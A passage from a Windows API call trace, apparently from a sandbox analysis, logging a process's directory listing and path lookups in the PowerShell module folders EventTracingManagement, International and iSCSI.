nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0264.842] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.842] FindClose (in: hFindFile=0x1a8dbce0 | out: hFindFile=0x1a8dbce0) returned 1 [0264.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.842] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0264.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.842] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.842] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0264.842] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", lpFilePart=0x0) returned 0x4a [0264.843] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.843] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.843] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.psd1", cAlternateFileName="")) returned 1 [0264.843] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.843] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2353, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.cdxml", cAlternateFileName="")) returned 1 [0264.844] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1752, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0264.844] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.cdxml", cAlternateFileName="")) returned 1 [0264.844] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0264.844] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.cdxml", cAlternateFileName="")) returned 1 [0264.844] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0264.845] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 0 [0264.845] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.845] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\eventtracingmanagement.psd1")) returned 0x20 [0264.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.845] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0264.845] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", lpFilePart=0x0) returned 0x41 [0264.845] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.846] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.846] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 1 [0264.846] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 0 [0264.846] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.846] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0264.847] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", lpFilePart=0x0) returned 0x41 [0264.847] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db140 [0264.847] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.847] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 1 [0264.847] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.847] FindClose (in: hFindFile=0x1a8db140 | out: hFindFile=0x1a8db140) returned 1 [0264.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.847] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0264.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.848] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.848] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0264.848] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", lpFilePart=0x0) returned 0x41 [0264.848] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db020 [0264.848] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.848] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 1 [0264.849] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 0 [0264.849] FindClose (in: hFindFile=0x1a8db020 | out: hFindFile=0x1a8db020) returned 1 [0264.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.849] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\International.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\international.psd1")) returned 0x20 [0264.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.849] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0264.849] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", lpFilePart=0x0) returned 0x39 [0264.849] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.850] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.853] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI.psd1", cAlternateFileName="")) returned 1 [0264.853] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x185a, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSIConnection.cdxml", cAlternateFileName="")) returned 1 [0264.854] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSISession.cdxml", cAlternateFileName="")) returned 1 [0264.854] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a86, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITarget.cdxml", cAlternateFileName="")) returned 1 [0264.854] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 1 [0264.854] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 0 [0264.854] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.855] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0264.855] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", lpFilePart=0x0) 